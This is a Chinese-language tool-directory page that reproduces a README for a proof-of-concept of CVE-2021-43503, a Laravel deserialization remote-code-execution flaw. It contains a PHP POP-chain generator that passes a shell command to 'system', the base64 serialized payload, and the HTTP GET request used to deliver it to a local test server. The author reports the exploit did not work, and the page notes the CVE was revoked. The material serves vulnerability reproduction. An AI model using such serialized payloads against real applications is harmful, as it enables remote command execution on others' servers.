Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2021-43503 — CVE-2021-43503 的概念验证漏洞利用程序,针对 Laravel 反序列化远程代码执行(RCE)漏洞。包含 PHP POP 链生成和基于 HTTP 的载荷投递功能,用于测试。 | Kitploit
工具/GitHubGitHub/kang8/cve-2021-43503
Payload生成漏洞分析代码分析漏洞利用Web应用程序漏洞利用
GitHubkang8/cve-2021-43503

CVE-2021-43503

CVE-2021-43503 的概念验证漏洞利用程序,针对 Laravel 反序列化远程代码执行(RCE)漏洞。包含 PHP POP 链生成和基于 HTTP 的载荷投递功能,用于测试。

查看仓库
124年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

警告 该漏洞已被撤销

Override

这是关于 CVE-2021-43503 的内容,我无法通过 exp 重现此漏洞。

需求

  • PHP 7.1.*
  • Composer <= 2.2.12

复现漏洞

  1. 启动服务

    root@kitploit:~
    composer install
    cp .env.example .env
    php artisan key:generate
    php artisan serve # 它将在本地主机的 8000 端口监听
    
  2. 编码 POP 链

    root@kitploit:~
    <?php
    
    namespace Illuminate\Routing{
        class PendingResourceRegistration{
            protected $registrar;
            protected $name;
            protected $controller;
            protected $options = [];
            protected $registered = false;
            public function __construct($b){
                $this->registrar=$b;
            }
        }
    }
    
    
    namespace Illuminate\Queue\Capsule{
        class Manager{
            protected $manager;
            public function __construct($c)
            {
                $this->manager->method=$c;
            }
    
        }
    }
    
    namespace Mockery{
        class ClosureWrapper{
            private $closure;
            public function __construct(){
                $this->closure="system";
            }
        }
    }
    
    namespace{
    
        use Illuminate\Queue\Capsule\Manager;
        use Illuminate\Routing\PendingResourceRegistration;
        use Mockery\ClosureWrapper;
    
        $c=new ClosureWrapper("mkdir hello");
        $b=new Manager($c);
        $a=new PendingResourceRegistration($b);
    
        echo base64_encode(serialize($a));
    }
    

    注意

    我将 urlencode(serialize($a)) 替换为 base64_encode(serialize($a))

    并将 dir 替换为 mkdir hello 以反映 RCE 的成功执行

    它将输出以上内容(忽略警告):

    root@kitploit:~
    Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ==
    
  3. 从 HTTP 的 GET 方法测试:

    通过浏览器访问 http://localhost:8000/?ser=Tzo0NjoiSWxsdW1pbmF0ZVxSb3V0aW5nXFBlbmRpbmdSZXNvdXJjZVJlZ2lzdHJhdGlvbiI6NTp7czoxMjoiACoAcmVnaXN0cmFyIjtPOjMyOiJJbGx1bWluYXRlXFF1ZXVlXENhcHN1bGVcTWFuYWdlciI6MTp7czoxMDoiACoAbWFuYWdlciI7Tzo4OiJzdGRDbGFzcyI6MTp7czo2OiJtZXRob2QiO086MjI6Ik1vY2tlcnlcQ2xvc3VyZVdyYXBwZXIiOjE6e3M6MzE6IgBNb2NrZXJ5XENsb3N1cmVXcmFwcGVyAGNsb3N1cmUiO3M6Njoic3lzdGVtIjt9fX1zOjc6IgAqAG5hbWUiO047czoxMzoiACoAY29udHJvbGxlciI7TjtzOjEwOiIAKgBvcHRpb25zIjthOjA6e31zOjEzOiIAKgByZWdpc3RlcmVkIjtiOjA7fQ==

    访问 exp 案例

    它没有成功在 public/ 中创建 hello/。

下载工具